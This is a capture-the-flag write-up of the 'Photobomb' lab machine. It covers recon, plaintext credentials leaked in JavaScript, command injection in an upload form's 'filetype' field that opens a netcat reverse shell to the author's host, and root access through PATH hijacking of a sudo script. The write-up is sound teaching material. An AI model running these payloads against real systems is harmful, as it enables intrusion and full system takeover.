Photobomb

Recon

nmap_scan.log
Open 10.129.241.84:22
Open 10.129.241.84:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -sC -Pn" on ip 10.129.241.84

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCwlzrcH3g6+RJ9JSdH4fFJPibAIpAZXAl7vCJA+98jmlaLCsANWQXth3UsQ+TCEf9YydmNXO2QAIocVR8y1NUEYBlN2xG4/7txjoXr9QShFwd10HNbULQyrGzPaFEN2O/7R90uP6lxQIDsoKJu2Ihs/4YFit79oSsCPMDPn8XS1fX/BRRhz1BDqKlLPdRIzvbkauo6QEhOiaOG1pxqOj50JVWO3XNpnzPxB01fo1GiaE4q5laGbktQagtqhz87SX7vWBwJXXKA/IennJIBPcyD1G6YUK0k6lDow+OUdXlmoxw+n370Knl6PYxyDwuDnvkPabPhkCnSvlgGKkjxvqks9axnQYxkieDqIgOmIrMheEqF6GXO5zz6WtN62UAIKAgxRPgIW0SjRw2sWBnT9GnLag74cmhpGaIoWunklT2c94J7t+kpLAcsES6+yFp9Wzbk1vsqThAss0BkVsyxzvL0U9HvcyyDKLGFlFPbsiFH7br/PuxGbqdO9Jbrrs9nx60=
|   256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBrVE9flXamwUY+wiBc9IhaQJRE40YpDsbOGPxLWCKKjNAnSBYA9CPsdgZhoV8rtORq/4n+SO0T80x1wW3g19Ew=
|   256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEp8nHKD5peyVy3X3MsJCmH/HIUvJT+MONekDg5xYZ6D
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://photobomb.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP (80)

Writeup.png

Leaked Credentials

In the source we can view the Javascript file which contains plaintext credentials 💀

└─$ curl http://photobomb.htb/photobomb.js
function init() {
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
  if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
    document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer');
  }
}
window.onload = init;

Creds: pH0t0:b0Mb!

SQLi

Writeup-1.png

When testing for SQLi the application crashed with backtrace (I accidently encoded & sign and that was the reason)

Writeup-2.png

Leaked env:

Writeup-3.png

Command Injection

I was thinking heavily on SQLi, but then testing for Command Injection we get different output. Normal request takes ~2sec, adding 3sec sleep it takes >5sec.

Writeup-4.png

curl makes a callback

└─$ listen 80
Ncat: Connection from 10.129.241.84:35510.
GET / HTTP/1.1
Host: 10.10.14.113
User-Agent: curl/7.68.0
Accept: */*
└─$ curl 'http://photobomb.htb/printer' -H 'Authorization: Basic cEgwdDA6YjBNYiE=' -d $'photo=kevin-charit-XZoaTJTnB9U-unsplash.jpg&filetype=jpg; busybox nc 10.10.14.113 4444 -e /bin/bash&dimensions=3000x2000'

Reverse Shell

└─$ pwncat-cs -lp 4444
[08:28:32] received connection from 10.129.241.84:40584                                        bind.py:84
(remote) wizard@photobomb:/home/wizard/photobomb$ id
uid=1000(wizard) gid=1000(wizard) groups=1000(wizard)

User.txt

(remote) wizard@photobomb:/home/wizard/photobomb$ cat ../user.txt
baf544549755cc416da3db78109ae485

Privilege Escalation

(remote) wizard@photobomb:/home/wizard/photobomb$ sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh
(remote) wizard@photobomb:/home/wizard/photobomb$ cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

We have SETENV with sudo and find doesn't have absolute path.

(remote) wizard@photobomb:/home/wizard$ echo $'#!/bin/bash\ninstall -m4777 /bin/bash /tmp/rootbash' > find
(remote) wizard@photobomb:/home/wizard$ chmod +x find
(remote) wizard@photobomb:/home/wizard$ sudo PATH="/home/wizard:$PATH" /opt/cleanup.sh
(remote) wizard@photobomb:/home/wizard$ ls /tmp/rootbash -l
-rwsrwxrwx 1 root root 1183448 Dec  8 13:33 /tmp/rootbash

Root.txt

(remote) wizard@photobomb:/home/wizard$ /tmp/rootbash -p
(remote) root@photobomb:/home/wizard# cat /root/root.txt
9d72864ffe37f0f68018e62140516fb2
PreviousPerspectiveNextPoison

Last updated